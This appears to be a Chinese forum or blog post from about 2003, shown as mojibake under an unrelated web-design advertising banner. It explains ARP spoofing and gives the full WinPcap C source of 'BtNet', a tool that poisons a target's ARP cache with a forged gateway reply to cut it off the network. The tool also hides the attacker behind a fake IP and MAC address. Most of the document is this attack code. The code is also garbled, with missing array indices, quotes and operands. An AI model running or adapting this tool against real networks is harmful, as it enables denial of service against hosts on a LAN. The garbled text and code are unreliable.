ÍøÕ¾Éè¼Æ|ÍøÕ¾ÖÆ×÷|ÍøÕ¾½¨Éè·þÎñÍø
¡¡¡¡×ÊÉîµÄÍøÕ¾Éè¼ÆÈËÔ±£¬ÒÔ¾«Õ¿µÄÍøÕ¾Éè¼Æ¼¼Êõ¡¢ÓÅÖʵÄÍøÕ¾ÖÆ×÷·þÎñ,ΪÄúÌṩȫ·½Î»µÄÍøÕ¾Éè¼Æ¡¢ÍøÕ¾ÖÆ×÷·þÎñ£¬¾«ÐÄÍƳöÍøÕ¾ÖÆ×÷µÄ¶àÖÖ¿Æѧ·½°¸,´ÓÍøÕ¾Éè¼Æµ½ÍøÕ¾ÖÆ×÷¡¢ÍøÕ¾Íƹ㡢±£Ö¤Äú×î´óÏÞ¶ÈÓµÓÐÐÅÏ¢»¯µÄÍøÕ¾Éè¼ÆÓÅÊÆ.

»ùÓÚarpÆÛÆ­µÄÍøÂç¹¥»÷³ÌÐò

written by Ruder
Homepage:http://xEyes.cdut.net/ruder/ && http://www.cnwill.com/ruder/
Email:cocoruder@163.com

×î½ü¿ªÊ¼Ñ§WINPCAP£¬¿´Á˺ܶà¸ßÊÖдµÄ»ùÓÚarpÆÛÆ­µÄ×¥°ü¹¤¾ß£¬ÓÈÆäÊǵç×Ó¿Æ´óµÄTOo2yʦÐֵġ¶Ïê̸µ÷ÓÃwinpcapÇý¶¯Ð´arp¶à¹¦Äܹ¤¾ß¡·£¬ÁîÎÒÊÕÒæ·Çdz¡£ÏÂÃæÊÇÎÒ°ÑÕâ¸ö˼Ïë¸Ä³Éarp¹¥»÷³ÌÐò(¿ÉÁîÄ¿±êÖ÷»ú¶Ï¿ªÍøÂçÁ¬½Ó)µÄһЩ²âÊÔ¡£¸ßÊÖÇëÂÔ¹ý£¬ÒÔÃâÓаàÃÅŪ¸«Ö®ÏС£
Ò»°ãµÄarp spoofÊÇÏò±»ÆÛÆ­Ö÷»ú·¢ËÍARP REPLYÊý¾Ý±¨,°ÑÆäÖеÄÔ´IPµØÖ·ÖÃΪ±»ÆÛÆ­Ö÷»úÒª·¢°üÈ¥µÄÖ÷»úµØÖ·£¬Ô´MACµØÖ·È´¸ÄΪ×Ô¼ºµÄMACµØÖ·¡£¼ÙÉèÓÐÁ½Ì¨»úÆ÷A,B£¬·¢ËÍÒ»¸öARP REPLYÊý¾Ý±¨¸øA,ÆäÖÐÔ´IPµØַΪBµÄµØÖ·,Ô´MACµØַΪÎҵĻúÆ÷µÄMACµØÖ·(IPRouter¹¦ÄÜ´ò¿ªÈ·±£Êý¾Ý±»×ª·¢)£¬ÄÇôA·¢Ë͵½BµÄÊý¾Ý±¨¾Í·¢µ½ÎҵĻúÆ÷ÉÏÁË£¬Í¬Ñù¶ÔB×öÏàͬµ½²Ù×÷£¬ÄÇôA<==>BÖ®¼äµÄÊý¾Ý¾Í»áÔ´Ô´²»¶ÏµÄͨ¹ýÎҵĻúÆ÷ת·¢£¬Ö±µ½Ò»¸öÕý³£µÄARP°ü¸ü¸ÄÁËA,BµÄarp»º´æΪֹ¡£
ÄÇôÎÒÃÇ°Ñ·¢Ë͸øAµÄarpÊý¾Ý±¨µÄÔ´IP,Ô´MAC¸ü¸Ä³ÉÈÎÒâµÄ£¬»á³öÏÖʲôÏÖÏó£¿ÏÂÃæÊÇÎҵļ¸¸ö²âÊÔ
1. Ô´IP¸ü¸ÄΪÍø¹ØIP,Ô´MAC¸ÄΪ²»´æÔÚµÄMACµØÖ·
¶ÔÄ¿±êÖ÷»ú¼¸ºõ²»Ó°Ïì
2. Ô´IP¸ü¸ÄΪÍø¹ØIP,Ô´MAC¸ÄΪÄÚÍøÄÚÈÎÒâһ̨´æÔÚµ«Ã»ÓпªÆôIPRouterµÄÖ÷»úµÄMACµØÖ·
¼¸ºõ²»Ó°Ïì
3. Ô´IP¸ü¸ÄΪÍø¹ØIP,Ô´MAC¸ÄΪĿ±êÖ÷»úµÄMAC
Ä¿±êÖ÷»úÁ¢¿Ì¶ÏÍø!

¿É¼ûµ±·¢Ë;­¹ýÎÒÃǹ¹ÔìµÄARP REALY°ü¸øÄ¿±êÖ÷»úʱ,»áʹĿ±êÖ÷»úµÄARP»º´æ¸ü¸Ä£¬Êý¾Ý·â×°µ½MAC²ãµÄʱºò»á°ÑÍø¹ØµÄIPºÍ×Ô¼ºµÄMACµØÖ··â×°µ½Ò»Æð£¬ÄÇô·¢Ë͵½Íø¹ØµÄÊý¾Ý±¨Ö»ºÃ·¢¸ø×Ô¼ºÁË£¬ºÇºÇ¡£
ÖÁÓÚµÚ1ÖÖÇé¿ö£¬²ÂÏë´ó¸ÅÊÇÓÉÓÚMACµØÖ·²»´æÔÚ,Ä¿±êÖ÷»ú»á¹ã²¥Ò»¸öARP REQUEST°ü¶ø¸üÐÂÁË×Ô¼ºµÄARP»º´æËùÖ¡£
ÖÁÓÚµÚ2ÖÖÇé¿ö£¬²ÂÏëÔ´MACµØÖ·ËùÊôÖ÷»ú»á·µ»ØÒ»¸öARP REPLY¸øÄ¿±êÖ÷»ú¡£
ˮƽÓÐÏÞ£¬ËùÒÔÖ»ÊDzÂÏ룬֪µÀµÄÇë¸æËßÎÒÒ»Éù£¬ÏÈл¹ýÁË¡£

ÔÙ˵һÏ£¬ÒÔÉϲâÊÔÖ»¶ÔÓÚwindowsϵͳ£¬µ±È»Ò²²âÊÔ¹ý¶ÔûÓÐÅäÖúõÄRed Hat³É¹¦¹ý¡£
²âÊÔ³ÌÐò(BtNet.exe)˵Ã÷£º
Usage: BtNet -h attackIP -o gateIP [-m spoofedMAC]
-m²ÎÊýÊÇÄãÒªÐ޸ĵÄÔ´MACµØÖ·.
ΪÁËÒþ±Î¹¥»÷ÕßÉí·Ý£¬³ÌÐòÔٵõ½Ä¿±êÖ÷»úMACµØַʱαװ³ÉIP:128.128.128.128,MAC:a5-a5-a5-a5-a5-a5£¬¿ÉÄÜ»áµÃ²»µ½Ä¿±êÖ÷»úµÄMACµØÖ·£¬ÄÇôҪµÃµ½MACµØÖ·Çë½èÖúµÚÈý·½¹¤¾ß¡£

¸½²âÊÔ³ÌÐò´úÂë
#include "packet32.h"
#include "ntddndis.h"
#include <stdio.h>
#include <conio.h>
#include <winsock2.h>
#include <windows.h>

#pragma comment(lib,"ws2_32")
#pragma comment(lib,"packet")

#define ETH_IP 0x0800
#define ETH_ARP 0x0806
#define ARP_REQUEST 0x0001 //arpÇëÇó°ü
#define ARP_REPLY 0x0002 //arpÓ¦´ð°ü
#define ARP_HARDWARE 0x0001
#define max_num_adapter 10

#pragma pack(push,1)

typedef struct ethdr
{
unsigned char eh_dst[6]; //ÒÔÌ«ÍøÄ¿µÄµØÖ·
unsigned char eh_src[6]; //ÒÔÌ«ÍøÔ´µØÖ·
unsigned short eh_type; //
}ETHDR,*PETHDR;
typedef struct arphdr //arpÍ·
{
unsigned short arp_hdr; //Ó²¼þÀàÐÍ
unsigned short arp_pro; //ЭÒéÀàÐÍ
unsigned char arp_hln; //Ó²¼þµØÖ·³¤¶È
unsigned char arp_pln; //ЭÒéµØÖ·³¤¶È
unsigned short arp_opt; //
unsigned char arp_sha[6]; //·¢ËͶËÒÔÌ«ÍøµØÖ·
unsigned long arp_spa; //·¢ËͶËipµØÖ·
unsigned char arp_tha[6]; //½ÓÊÕ¶ËÒÔÌ«ÍøµØÖ·
unsigned long arp_tpa; //½ÓÊÕ¶ËipµØÖ·
}ARPHDR,*PARPHDR;

typedef struct ip_mac
{
u_long ip;
unsigned char mac[6];
}IP_MAC,*PIP_MAC;

#pragma pack(push)

LPADAPTER lpAdapter;
char adapterlist[max_num_adapter][1024];
IP_MAC toipandmac;
IP_MAC oipandmac,myipandmac;
BOOL param6=FALSE;
char *noMACstr;
char noMAC[6][3];
u_long mytoIP,oIP;
BOOL sendtoOip;
MSG msg;
UINT newtimer;
char MYIP[20]="128.128.128.128";
BOOL toipandmac_flag=FALSE,myipandmac_flag=FALSE,oipandmac_flag=FALSE;

int getint(char c)
{
int t=-1;
if((c<=9)&&(c>=0))
t=c-0;
else if((c>=a)&&(c<=f))
t=10+c-a;
else if((c>=A)&&(c<=F))
t=10+c-A;
return t;
}

void start()
{
printf("BtNet //--an ARP Tool test the Windows Break the Internet\n");
printf("written by Ruder,10/2003\n");
printf("Homepage: http://xEyes.cdut.net/ruder/index.htm\;n");
printf("E-mail: cocoruder@163.com\n");
printf("\nUsage: BtNet -h attackIP -o gateIP [-m spoofedMAC]\n");
printf("Example:\n");
printf("BtNet -h 202.115.138.12 -o 202.115.138.1\n");
printf("BtNet -h 202.115.138.12 -o 202.115.138.1 -m 00-50-fc-6a--6b--7c\n");
printf(" Warning: You must have installed the winpcap_2.3 or winpcap_3.0_alpha\n");
return ;
}

DWORD WINAPI sniff(LPVOID)
{
LPPACKET lppackets,lpPacketr;
char recvbuf[1024*250];
ULONG ulbytesreceived,off;
ETHDR *eth;
ARPHDR *arp;
char *buf,*pChar,*base;
char szTemp[20];
struct bpf_hdr *hdr;

if((lppackets=PacketAllocatePacket())==FALSE)
{
printf("PacketAllocatePacket send Error: %d\n",GetLastError());
return 0;
}

if(PacketSetHwFilter(lpAdapter,NDIS_PACKET_TYPE_PROMISCUOUS)==FALSE)
{
printf("Warning: Unable to set the adapter to promiscuous mode\n");
}

if(PacketSetBuff(lpAdapter,500*1024)==FALSE)
{
printf("PacketSetBuff Error: %d\n",GetLastError());
return 0;
}

if(PacketSetReadTimeout(lpAdapter,1)==FALSE)
{
printf("Warning: Unable to set the timeout\n");
}

if((lpPacketr=PacketAllocatePacket())==FALSE)
{
printf("PacketAllocatePacket receive Error: %d\n",GetLastError());
return 0;
}

PacketInitPacket(lpPacketr,(char *)recvbuf,sizeof(recvbuf));

while(!kbhit())
{
if(PacketReceivePacket(lpAdapter,lpPacketr,TRUE)==FALSE)
{
return 0;
}
//getdata(lppacketr,option);
ulbytesreceived=lpPacketr->ulBytesReceived;
buf=(char *)lpPacketr->Buffer;

off=0;
while(off<ulbytesreceived)
{
if(kbhit())
{
return 0;
}
hdr=(struct bpf_hdr *)(buf+off);
off+=hdr->bh_hdrlen;

pChar=(char *)(buf+off);
base=pChar;
off=Packet_WORDALIGN(off+hdr->bh_caplen);

eth=(PETHDR)pChar; //ÒÔÌ«Í·
arp=(PARPHDR)(pChar+sizeof(ETHDR)); //arpÍ·
int i;

if((eth->eh_type==htons(ETH_ARP))&&
(arp->arp_opt==htons(ARP_REPLY)))
{
//if (arp->arp_tpa==htonl(ntohl(inet_addr(MYIP))))
{
if(oipandmac_flag&&myipandmac_flag&&toipandmac_flag)
return 0;
if (((toipandmac.ip==htonl(arp->arp_spa))&&(toipandmac_flag==FALSE))
||((myipandmac.ip==htonl(arp->arp_spa))&&(myipandmac_flag==FALSE))
||((oipandmac.ip==htonl(arp->arp_spa))&&(oipandmac_flag==FALSE)))
{
memset(szTemp,0,sizeof(szTemp));
memcpy(szTemp,&arp->arp_spa,sizeof(arp->arp_spa));

printf("[IP]:");
printf("%s",inet_ntoa(*((struct in_addr *)szTemp)));
printf("[MAC]:");
for(i=0;i<5;i++)
{
printf("%.2x-",eth->eh_src);
}
printf("%.2x",eth->eh_src[5]);
printf("\n");

if (toipandmac.ip==htonl(arp->arp_spa))
{
for(i=0;i<6;i++)
toipandmac.mac=eth->eh_src;
toipandmac_flag=TRUE;
}

if (oipandmac.ip==htonl(arp->arp_spa))
{
for(i=0;i<6;i++)
oipandmac.mac=eth->eh_src;
oipandmac_flag=TRUE;
// printf("if you have get the MAC Addresses enough,Press any key for staring!\n");
}
if(myipandmac.ip==htonl(arp->arp_spa))
{
for(i=0;i<6;i++)
myipandmac.mac=eth->eh_src;
myipandmac_flag=TRUE;
}
}
}
}
continue;
}
}
return 0;
}

DWORD WINAPI sendARPPacket(LPVOID dwsendtoIP)
{
LPPACKET lpPacket;
ETHDR eth;
ARPHDR arphdr;
int i;
char szPacketBuf[600];
u_long sendtoIP=*(u_long *)dwsendtoIP;
//struct sockaddr_in sin;

lpPacket = PacketAllocatePacket();
if(lpPacket==NULL)
{
printf("\nPacketAllocatePacket error!");
return 0;
}
eth.eh_type=htons(ETH_ARP);
for(i=0;i<6;i++)
{
eth.eh_dst=0xff;
eth.eh_src=0xa5;
arphdr.arp_sha=0xa5;
arphdr.arp_tha=0xff;
}

arphdr.arp_hdr=htons(ARP_HARDWARE);
arphdr.arp_pro=htons(ETH_IP);
arphdr.arp_opt=htons(ARP_REQUEST);
arphdr.arp_hln=6;
arphdr.arp_pln=4;

arphdr.arp_tpa=htonl(sendtoIP);
arphdr.arp_spa=htonl(ntohl(inet_addr(MYIP)));
if(sendtoOip)
{

if(myipandmac_flag)
{
for(i=0;i<6;i++)
{
eth.eh_src=myipandmac.mac;
arphdr.arp_sha=myipandmac.mac;
arphdr.arp_spa=htonl(myipandmac.ip);
//memset(MYIP,0,sizeof(MYIP));

}
}
else
{
printf("My MAC Address Cant Find!\n");
return 0;
}
}

memset(szPacketBuf,0,sizeof(szPacketBuf));
memcpy(szPacketBuf,?,sizeof(ETHDR));
memcpy(szPacketBuf+sizeof(ETHDR),&arphdr,sizeof(ARPHDR));

PacketInitPacket(lpPacket,szPacketBuf,60);
if(PacketSetNumWrites(lpAdapter, 1)==FALSE)
{
printf("warning: Unable to send more than one packet in a single write!\n");
}

if(PacketSendPacket(lpAdapter, lpPacket, TRUE)==FALSE)
{
printf("Error sending the packets!\n");
PacketFreePacket(lpPacket);
return 0;
}

PacketFreePacket(lpPacket);

return 0;
}

DWORD WINAPI sendSR()
{
ETHDR eth;
ARPHDR arphdr;
int i;
char szPacketBuf[600];
LPPACKET lpPacket;
unsigned char toMAC[6];
struct sockaddr_in sin;
u_long toIP=mytoIP;

//if ((myipandmac_flag==FALSE)||(oipandmac_flag==FALSE)||(toipandmac_flag==FALSE))
//{
// printf("Cant get all MAC address!\n");
// return 0;
//}
lpPacket = PacketAllocatePacket();
if(lpPacket == NULL)
{
printf("\nError:failed to allocate the LPPACKET structure.\n");
return 0;
}
if (toipandmac_flag==FALSE)
{
printf("Cant get toMAC address!\n");
return 0;
}

memset(toMAC,0,sizeof(toMAC));
memcpy(toMAC,&toipandmac.mac,sizeof(toipandmac.mac));

if (param6)
{
for(i=0;i<6;i++)
{
int t1,t2;
char c1,c2;
c1=noMAC[0];
c2=noMAC[1];

t1=getint(c1);
t2=getint(c2);

if((t1==-1)||(t2==-1))
{
printf("-m parameter error!\n");
return 0;
}

eth.eh_src=t1*16+t2;
eth.eh_dst=toMAC;
arphdr.arp_sha=t1*16+t2;
arphdr.arp_tha=toMAC;
}
}
else
{
for(i=0;i<6;i++)
{
eth.eh_src=toMAC;
eth.eh_dst=toMAC;
arphdr.arp_sha=toMAC;
arphdr.arp_tha=toMAC;
}
}

eth.eh_type=htons(ETH_ARP);

arphdr.arp_spa=htonl(oIP);
arphdr.arp_tpa=htonl(toIP);

arphdr.arp_hdr=htons(ARP_HARDWARE);
arphdr.arp_pro=htons(ETH_IP);
arphdr.arp_opt=htons(ARP_REPLY);
arphdr.arp_hln=6;
arphdr.arp_pln=4;

memset(szPacketBuf,0,sizeof(szPacketBuf));
memcpy(szPacketBuf,?,sizeof(ETHDR));
memcpy(szPacketBuf+sizeof(ETHDR),&arphdr,sizeof(ARPHDR));

PacketInitPacket(lpPacket,szPacketBuf,60);
if(PacketSetNumWrites(lpAdapter, 1)==FALSE)
{
printf("warning: Unable to send more than one packet in a single write!\n");
}
if(PacketSendPacket(lpAdapter, lpPacket, TRUE)==FALSE)
{
printf("Error sending the packets!\n");
PacketFreePacket(lpPacket);
return 0;
}
PacketFreePacket(lpPacket);

sin.sin_addr.s_addr=arphdr.arp_tpa;

printf("spoof %s: ",inet_ntoa(sin.sin_addr));
sin.sin_addr.s_addr=arphdr.arp_spa;
printf("%s-->",inet_ntoa(sin.sin_addr));

for(i=0;i<5;i++)
printf("%.2x-",arphdr.arp_sha);
printf("%x",arphdr.arp_sha[5]);
printf("\n");

return 0;
}

DWORD WINAPI sendSRTimer(LPVOID dwtoIP)
{
printf("Waiting spoof Start\n");
mytoIP=*(u_long *)dwtoIP;
newtimer=SetTimer(NULL,NULL,5*1000,TIMERPROC(sendSR));

while(GetMessage(&msg,0,0,0))
{
TranslateMessage(&msg);
DispatchMessage(&msg);
}
return 0;
}

int main(int argc,char *argv[])
{
HANDLE thread1,thread2,thread3;
WCHAR adaptername[8192];
WCHAR *name1,*name2;
ULONG adapterlength;
DWORD threadid1,threadid2,threadid3;
u_long toIP,myip;
struct NetType ntype;
struct sockaddr_in sin;
struct npf_if_addr ipbuff;
int adapternum=0,opti=0,open,i,j;
long npflen;

if((argc!=5)&&(argc!=7))
{
start();
return 0;
}
else if((strcmp(argv[1],"-h")!=0)||(strcmp(argv[3],"-o")!=0))
{
start();
return 0;
}

toIP=ntohl(inet_addr(argv[2]));
oIP=ntohl(inet_addr(argv[4]));

if (argv[5]!=NULL)
{
if (strcmp(argv[5],"-m")==0)
{
noMACstr=argv[6];
j=0;

for(i=0;i<6;i++)
{
memset(noMAC,0,sizeof(noMAC));
memcpy(noMAC,noMACstr,2);
noMACstr=noMACstr+3;
}
param6=TRUE;
}
}
printf("\nLibarary Version: %s",PacketGetVersion());
adapterlength=sizeof(adaptername);

if(PacketGetAdapterNames((char *)adaptername,&adapterlength)==FALSE) //µÃµ½Íø¿¨Áбí
{
printf("PacketGetAdapterNames Error: %d\n",GetLastError());
return -1;
}

name1=adaptername;
name2=adaptername;
i=0;

while((*name1!=\0) || (*(name1-1)!=\0))
{
if(*name1==\0)
{
memcpy(adapterlist,name2,2*(name1-name2));
name2=name1+1;
i++;
}
name1++;
}

adapternum=i;
printf("\nAdapters Installed:\n");
for(i=0;i<adapternum;i++)
wprintf(L"%d - %s\n",i+1,adapterlist);

do
{
printf("\nSelect the number of the adapter to open: ");
scanf("%d",&open);
if(open>=1 && open<=adapternum)
break;
}while(open<1 || open>adapternum);

lpAdapter=PacketOpenAdapter(adapterlist[open-1]);

if(!lpAdapter || (lpAdapter->hFile==INVALID_HANDLE_VALUE))
{
printf("PacketOpenAdapter Error: %d\n",GetLastError());
return -1;
}

if(PacketGetNetType(lpAdapter,&ntype))
{
printf("\n\t\t*** Host Information ***\n");
printf("[LinkTpye:]\t%d\t\t",ntype.LinkType);
printf("[LinkSpeed:]\t%d b/s\n",ntype.LinkSpeed);
}

npflen=sizeof(ipbuff);
if(PacketGetNetInfoEx(adapterlist[open-1],&ipbuff,&npflen))
{
sin=*(struct sockaddr_in *)&(ipbuff.Broadcast);
printf("[Broadcast:]\t%.16s\t",inet_ntoa(sin.sin_addr));

sin=*(struct sockaddr_in *)&(ipbuff.SubnetMask);
printf("[SubnetMask:]\t%.16s\n",inet_ntoa(sin.sin_addr));

sin=*(struct sockaddr_in *)&(ipbuff.IPAddress);
printf("[IPAddress:]\t%.16s\t",inet_ntoa(sin.sin_addr));
myip=ntohl(sin.sin_addr.s_addr);

printf("[MACAddress:]");
}
else
{
printf("\nNot get enough data\n");
//PacketFreePacket(lppackets);
PacketCloseAdapter(lpAdapter);
return -1;
}
printf("\n");

oipandmac.ip=oIP;
toipandmac.ip=toIP;
myipandmac.ip=myip;
sendtoOip=FALSE;

thread1=CreateThread(NULL,0,sniff,NULL,0,&threadid1);
Sleep(300);
thread2=CreateThread(NULL,0,sendARPPacket,(LPVOID)&myip,0,&threadid2);
Sleep(100);
CloseHandle(thread2);
thread2=CreateThread(NULL,0,sendARPPacket,(LPVOID)&toIP,0,&threadid2);
Sleep(10);
CloseHandle(thread2);
sendtoOip=TRUE;
Sleep(200);
thread2=CreateThread(NULL,0,sendARPPacket,(LPVOID)&oIP,0,&threadid2);
Sleep(10);
CloseHandle(thread2);
// WaitForSingleObject(thread1,INFINITE);
thread3=CreateThread(NULL,0,sendSRTimer,(LPVOID)&toIP,0,&threadid3);
WaitForSingleObject(thread3,INFINITE);

PacketCloseAdapter(lpAdapter);

return 0;
}